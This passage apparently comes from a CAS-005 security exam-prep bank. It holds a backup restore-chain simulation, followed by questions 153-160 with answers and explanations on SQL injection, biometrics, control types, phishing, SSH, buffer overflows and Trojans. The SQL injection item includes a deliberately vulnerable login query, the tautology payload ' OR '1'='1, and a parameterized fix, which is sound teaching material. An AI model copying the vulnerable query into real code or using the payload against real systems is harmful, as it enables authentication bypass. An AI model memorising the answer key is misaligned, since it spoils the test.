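    """Minimal list of jobs, in apply order, needed to rebuild the data as of target_day."""
    relevant = [j for j in jobs if j.day <= target_day]
    full = max([j for j in relevant if j.kind == "full"], key=lambda j: j.day)
    later = [j for j in relevant if j.day > full.day]
    if not later:
        return [full]
    if later[-1].kind == "differential":
        return [full, later[-1]]              # full + latest differential only
    return [full] + later                     # full + every incremental since, in order

def restore(jobs, target_day):
    state = {}
    for job in restore_chain(jobs, target_day):
        state.update(job.files)
    return state

def expected_state(changes, target_day):
    """Ground truth: replay the change history directly."""
    state = {}
    for day in range(target_day + 1):
        state.update(changes[day])
    return state

def storage_used(jobs):
    """Total file copies held across all jobs (a proxy for storage consumed)."""
    return sum(len(j.files) for j in jobs)

if __name__ == "__main__":
    for strategy in ("incremental", "differential"):
        jobs = simulate(CHANGES, strategy)
        chain = [(j.day, j.kind) for j in restore_chain(jobs, 3)]
        print(strategy, "restore chain:", chain, "storage:", storage_used(jobs))
```

On this history both strategies rebuild the same day-3 state, but the incremental restore applies four jobs while storing 8 file copies, and the differential restore applies two jobs while storing 10. Losing any one incremental job breaks every later restore point, which is why restore testing belongs in the procedure.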
Question 153:
Which type of attack injects malicious SQL statements into an application to manipulate the backend database?
A. Cross-Site Scripting (XSS)
B. SQL Injection
C. Command Injection
D. Buffer Overflow
Answer: B. SQL Injection
Explanation:
Cross-Site Scripting (XSS): XSS attacks inject scripts into web pages executed by users’ browsers. CAS-005 categorizes XSS as a client-side attack targeting confidentiality and integrity of web sessions. XSS does not directly manipulate backend databases, although it can exfiltrate credentials used in database access. Mitigation includes input validation, output encoding, secure coding practices, and web application firewalls.
SQL Injection: SQL injection (SQLi) targets vulnerabilities in web applications that fail to properly validate input. CAS-005 emphasizes SQLi as a critical attack vector for compromising data integrity and confidentiality. Attackers inject malicious SQL statements to bypass authentication, extract sensitive information, modify records, or even escalate privileges within the database. Mitigation strategies include parameterized queries, prepared statements, stored procedures, rigorous input validation, and principle of least privilege for database accounts. SQLi demonstrates the importance of secure development practices, database hardening, and application security testing. CAS-005 highlights automated scanning, code review, and penetration testing to identify and remediate SQLi vulnerabilities. SQLi attacks have real-world consequences, including financial fraud, data breaches, regulatory penalties, and reputational damage.
Command Injection: Command injection attacks occur when applications improperly pass untrusted input to system-level commands, potentially executing arbitrary code on the host. CAS-005 differentiates command injection as targeting the operating system rather than the database backend. Mitigation requires input validation, proper sanitization, and secure coding practices.
Buffer Overflow: Buffer overflow exploits occur when an application writes more data into a buffer than allocated, overwriting adjacent memory. CAS-005 notes buffer overflows target memory corruption, code execution, or denial of service, distinct from SQLi, which manipulates structured query language in databases. Mitigation involves secure coding, bounds checking, stack protections, and memory safety practices.
Understanding SQL injection is essential for CAS-005 candidates to protect enterprise applications, maintain confidentiality, enforce integrity, and ensure compliance with data security regulations.
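The authentication-bypass case and the parameterized-query mitigation described above, shown side by side as an added example (not part of the original question set). It uses Python's standard-library sqlite3 module and a constructed in-memory users table; the table layout, the sample user and the hash value are assumptions for illustration.

```python
import sqlite3

# Constructed in-memory database with a single sample user (not real data).
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'hash-of-correct-password')")
    conn.commit()
    return conn

def login_vulnerable(conn: sqlite3.Connection, username: str, password_hash: str) -> bool:
    # Untrusted input is concatenated straight into the SQL text, so the
    # input can change the structure of the query: this is the SQLi flaw.
    sql = ("SELECT COUNT(*) FROM users WHERE username = '" + username +
           "' AND password_hash = '" + password_hash + "'")
    return conn.execute(sql).fetchone()[0] > 0

def login_parameterized(conn: sqlite3.Connection, username: str, password_hash: str) -> bool:
    # Placeholders keep the query structure fixed; the driver passes the
    # values separately, so quotes inside the input are only data.
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password_hash = ?"
    return conn.execute(sql, (username, password_hash)).fetchone()[0] > 0

def demo() -> dict:
    # Runs both implementations against a legitimate login and against the
    # textbook tautology payload, returning the outcomes for comparison.
    conn = make_db()
    tautology = "' OR '1'='1"   # turns the WHERE clause into "... OR '1'='1'"
    return {
        "vulnerable_legit": login_vulnerable(conn, "alice", "hash-of-correct-password"),
        "vulnerable_bypass": login_vulnerable(conn, "nobody", tautology),       # True: bypassed
        "parameterized_legit": login_parameterized(conn, "alice", "hash-of-correct-password"),
        "parameterized_bypass": login_parameterized(conn, "nobody", tautology), # False: blocked
    }

if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

Pair the parameterized version with a database account restricted to the tables and operations the application needs, so that even a missed injection point cannot modify records or escalate privileges.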
Question 154:
Which authentication method verifies identity based on physical traits, such as fingerprints, retina patterns, or voice recognition?
A. Knowledge Factor
B. Possession Factor
C. Inherence Factor
D. Location Factor
Answer: C. Inherence Factor
Explanation:
Knowledge Factor: Knowledge-based authentication uses information the user knows, such as passwords, PINs, or security questions. CAS-005 emphasizes its widespread use but notes vulnerabilities to phishing, social engineering, and brute-force attacks. Knowledge factors are foundational but typically combined with other factors in multi-factor authentication.
Possession Factor: Possession-based authentication relies on physical items, like smart cards, hardware tokens, or mobile authentication devices. CAS-005 highlights possession factors as secure when combined with knowledge or inherence factors but distinct from biometrics.
Inherence Factor: Inherence factors, commonly referred to as biometrics, authenticate users based on inherent physical or behavioral traits, including fingerprints, facial recognition, iris scans, voice patterns, or typing cadence. CAS-005 emphasizes inherence factors for their high assurance of identity verification, particularly in secure enterprise environments. Inherence factors are resistant to password-based attacks and are often part of multi-factor authentication systems, combining knowledge, possession, and inherence for robust security. Candidates must understand biometric enrollment, matching algorithms, false acceptance/rejection rates, privacy considerations, template storage security, and integration with identity management systems. While highly secure, inherence factors are vulnerable to spoofing or replay attacks if not properly implemented. CAS-005 highlights the importance of secure sensor devices, encryption of biometric templates, liveness detection, and logging to detect anomalies.
Location Factor: Location factors authenticate based on geographic or network context, such as IP address or GPS location. CAS-005 recognizes location as an adaptive factor but not inherently based on user traits.
Inherence factors provide strong authentication in CAS-005-aligned security strategies, reinforcing identity assurance while supporting compliance and access control policies.
Question 155:
Which security control focuses on monitoring systems, networks, or applications to detect potential security incidents?
A. Preventive Control
B. Detective Control
C. Corrective Control
D. Compensating Control
Answer: B. Detective Control
Explanation:
Preventive Control: Preventive controls aim to stop security incidents before they occur. Examples include firewalls, access controls, encryption, and multi-factor authentication. CAS-005 emphasizes preventive measures as the first line of defense but notes that no system is entirely immune, highlighting the need for detective measures.
Detective Control: Detective controls identify, log, and alert administrators to security events, threats, or anomalies. Examples include intrusion detection systems (IDS), security information and event management (SIEM) systems, audit logs, and file integrity monitoring. CAS-005 emphasizes detective controls to enhance situational awareness, support incident response, and provide actionable data for remediation. Detective controls complement preventive controls by providing visibility into attempts to bypass protections. Effective detective controls require proper configuration, correlation of events, continuous monitoring, alert prioritization, and integration with incident response workflows. CAS-005 highlights the importance of aligning detective controls with organizational policies, regulatory compliance, and risk management strategies.
Corrective Control: Corrective controls aim to remediate security incidents after they occur, restoring systems and data to a secure state. Examples include patching, restoring from backups, account revocation, and malware removal. CAS-005 teaches corrective controls as part of the overall security lifecycle but distinct from detection.
Compensating Control: Compensating controls are alternative measures that reduce risk when primary controls cannot be implemented. Examples include using monitoring in place of unavailable encryption or manual processes when automated controls are impractical. CAS-005 notes that compensating controls must be documented, evaluated, and integrated into risk management frameworks.
Detective controls are critical in CAS-005 for identifying attacks, verifying compliance, and supporting forensic investigations. They form a bridge between preventive and corrective controls, enabling timely detection and appropriate response. Candidates must understand how to deploy, monitor, and maintain detective mechanisms to maintain enterprise security posture.
Question 156:
Which type of attack tricks users into providing sensitive information, often by impersonating a trusted entity through email or messaging?
A. Phishing
B. Spear Phishing
C. Whaling
D. Vishing
Answer: A. Phishing
Explanation:
Phishing: Phishing is a social engineering attack where attackers impersonate trusted entities, such as banks, employers, or service providers, to trick users into disclosing sensitive information like usernames, passwords, or financial details. CAS-005 emphasizes phishing as a human-centered threat, demonstrating the importance of user awareness, technical controls, and policy enforcement. Attackers often send mass emails or messages containing malicious links or attachments, exploiting human curiosity, trust, or urgency. Phishing can also serve as an initial step in more complex attacks like malware deployment, credential theft, or lateral network movement. Preventive measures include email filtering, domain authentication protocols (SPF, DKIM, DMARC), web content filtering, endpoint protection, multi-factor authentication, and security awareness training. CAS-005 candidates must understand phishing not only in terms of mechanics but also its impact on confidentiality, integrity, and organizational compliance. Monitoring suspicious activity, reporting procedures, and automated threat intelligence integration enhance defenses against phishing campaigns.
Spear Phishing: Spear phishing is a targeted form of phishing where attackers customize messages to a specific individual or organization. CAS-005 highlights spear phishing for its sophistication; attackers gather intelligence about the target to increase the likelihood of success. Unlike generic phishing, spear phishing requires more reconnaissance but often results in higher success rates. Mitigation involves the same controls as general phishing, but with added focus on personalized user awareness and executive protection strategies. Security teams should perform simulation exercises and monitor for unusual behaviors or attempted account access.
Whaling: Whaling targets high-profile individuals, such as executives or key personnel. CAS-005 recognizes whaling as a specialized social engineering tactic that can lead to significant organizational damage if successful. Whaling attacks often involve well-crafted emails, executive impersonation, and requests for wire transfers or confidential information. Protection involves executive awareness, strict approval procedures for financial actions, and monitoring executive accounts for unusual activity.
Vishing: Vishing involves voice-based social engineering, where attackers call targets pretending to be trusted authorities to extract sensitive information. CAS-005 emphasizes vishing as another human-centric attack vector. Mitigation includes employee training, call verification procedures, and policies prohibiting disclosure of sensitive information over phone lines without authentication.
Phishing and its variations exploit human factors, requiring a combination of technical, administrative, and procedural controls to protect organizational assets. CAS-005 underscores the importance of layered defenses, security culture, and awareness campaigns to reduce susceptibility to these attacks.
Question 157:
Which protocol provides secure remote access to a network by encrypting all communications over an unsecured connection?
A. Telnet
B. SSH
C. FTP
D. HTTP
Answer: B. SSH
Explanation:
Telnet: Telnet is a legacy protocol used for remote administration but transmits data, including credentials, in plaintext. CAS-005 highlights Telnet as insecure for modern networks because it lacks encryption, leaving sensitive information vulnerable to eavesdropping, MITM attacks, or credential theft. Organizations must avoid Telnet for remote access and replace it with secure alternatives.
SSH: Secure Shell (SSH) is a cryptographic protocol providing secure remote access, encrypting all data transmitted between the client and server. CAS-005 emphasizes SSH as a standard for network administration, file transfers, and secure tunneling. SSH ensures confidentiality, integrity, and authentication using public key cryptography, protecting against eavesdropping and MITM attacks. Candidates must understand key management, secure configurations, disabling weak algorithms, enforcing strong authentication (passwords, keys, multi-factor), and restricting access to authorized users. SSH is integral to enterprise security practices, enabling secure management of devices, servers, and network infrastructure. Proper logging, monitoring, and auditing of SSH sessions are also critical for compliance and incident response.
FTP: File Transfer Protocol (FTP) is used for transferring files but transmits data in plaintext, including credentials. CAS-005 notes FTP’s security weaknesses and recommends SFTP (SSH File Transfer Protocol) or FTPS (FTP over SSL/TLS) as secure alternatives.
HTTP: Hypertext Transfer Protocol (HTTP) is used for web communications and transmits data unencrypted. CAS-005 stresses that unencrypted HTTP exposes sensitive information to interception. HTTPS (HTTP over TLS/SSL) is the secure alternative, providing encryption, authentication, and integrity.
SSH aligns with CAS-005 objectives for secure remote management, enforcing encryption, strong authentication, access control, and compliance, ensuring confidentiality and integrity of network communications.
Question 158:
Which type of attack targets system memory to execute arbitrary code by overflowing a buffer?
A. SQL Injection
B. Buffer Overflow
C. Cross-Site Scripting (XSS)
D. Directory Traversal
Answer: B. Buffer Overflow
Explanation:
SQL Injection: SQL Injection targets application databases by injecting malicious SQL queries. CAS-005 categorizes it as an application-level attack affecting data integrity and confidentiality, but it does not involve memory manipulation. Mitigation focuses on parameterized queries, input validation, and secure coding.
Buffer Overflow: Buffer overflow occurs when data exceeds a buffer’s allocated memory, overwriting adjacent memory and potentially allowing arbitrary code execution. CAS-005 emphasizes buffer overflow as a critical vulnerability affecting availability, integrity, and potentially confidentiality. Attackers exploit poorly coded software to inject shellcode or escalate privileges. Mitigation strategies include bounds checking, safe coding practices, stack canaries, non-executable stacks, address space layout randomization (ASLR), and compiler-based protections. CAS-005 highlights buffer overflow prevention as essential for secure software development, vulnerability management, and endpoint protection.
Cross-Site Scripting (XSS): XSS injects scripts into web pages to execute in a user’s browser, targeting client-side vulnerabilities. CAS-005 categorizes XSS separately from memory exploitation attacks like buffer overflows. Preventive measures include input validation, output encoding, and content security policies.
Directory Traversal: Directory traversal exploits improper input validation to access unauthorized files on a server. CAS-005 highlights it as a file system and path manipulation vulnerability, not a memory corruption vulnerability. Mitigation involves secure coding, input sanitization, and least privilege file system permissions.
Buffer overflows demonstrate the importance of secure coding, memory management, and defensive programming. CAS-005 teaches candidates to recognize these vulnerabilities and implement layered protections to prevent exploitation, maintain integrity, and protect system availability.
Question 159:
Which type of control enforces security policies by automatically preventing unauthorized actions or access?
A. Detective Control
B. Corrective Control
C. Preventive Control
D. Compensating Control
Answer: C. Preventive Control
Explanation:
Detective Control: Detective controls identify and alert on security events. CAS-005 highlights their role in monitoring and incident response, but they do not prevent incidents from occurring.
Corrective Control: Corrective controls remediate issues after they occur, such as patching vulnerabilities or restoring backups. CAS-005 stresses their importance for recovery but not prevention.
Preventive Control: Preventive controls stop security incidents before they happen. CAS-005 emphasizes technical preventive measures like firewalls, access control lists, encryption, multi-factor authentication, endpoint protection, network segmentation, and secure configurations. Administrative preventive controls include policies, procedures, user training, and security awareness programs. Physical preventive controls include locks, access badges, and surveillance. Effective preventive controls reduce attack surfaces, enforce compliance, and uphold confidentiality, integrity, and availability. CAS-005 teaches candidates to implement layered preventive controls combining technical, administrative, and physical measures.
Compensating Control: Compensating controls serve as alternatives when primary controls are impractical. CAS-005 emphasizes that while compensating controls can reduce risk, they do not prevent incidents directly and must be documented and evaluated.
Preventive controls are foundational to enterprise security, minimizing exposure to threats, ensuring compliance, and supporting risk management frameworks. Candidates must understand their design, implementation, and integration with detective and corrective controls to maintain a robust security posture.
Question 160:
Which type of malware disguises itself as legitimate software to trick users into executing it, often delivering additional malicious payloads?
A. Trojan
B. Worm
C. Spyware
D. Ransomware
Answer: A. Trojan
Explanation:
Trojan: A Trojan masquerades as legitimate software to deceive users into execution. CAS-005 highlights Trojans as a key threat vector that compromises confidentiality, integrity, and sometimes availability. Once executed, Trojans can deliver additional malware, open backdoors, steal credentials, or grant remote access. Trojans differ from worms, as they do not self-replicate, and from spyware or ransomware, which have specific purposes like surveillance or data encryption. Mitigation involves user education, application whitelisting, endpoint protection, software verification, and network monitoring. CAS-005 emphasizes recognizing Trojans in the context of social engineering, secure software practices, and layered defenses.
Worm: Worms self-propagate across networks without user interaction. CAS-005 differentiates worms from Trojans; worms focus on rapid spread rather than deception. Mitigation involves patching, segmentation, and intrusion prevention systems.
Spyware: Spyware secretly monitors user activity, often for data collection. CAS-005 notes spyware’s threat to confidentiality but distinguishes it from Trojans, which rely on deception for execution. Prevention includes endpoint protection, privacy controls, and awareness training.
Ransomware: Ransomware encrypts data and demands payment for decryption. CAS-005 emphasizes its impact on availability but notes that ransomware may be delivered by Trojans, highlighting the need to prevent initial execution.
Trojan awareness is critical in CAS-005 for endpoint security, social engineering prevention, and layered threat mitigation. Candidates must understand detection, prevention, and response to ensure enterprise resilience.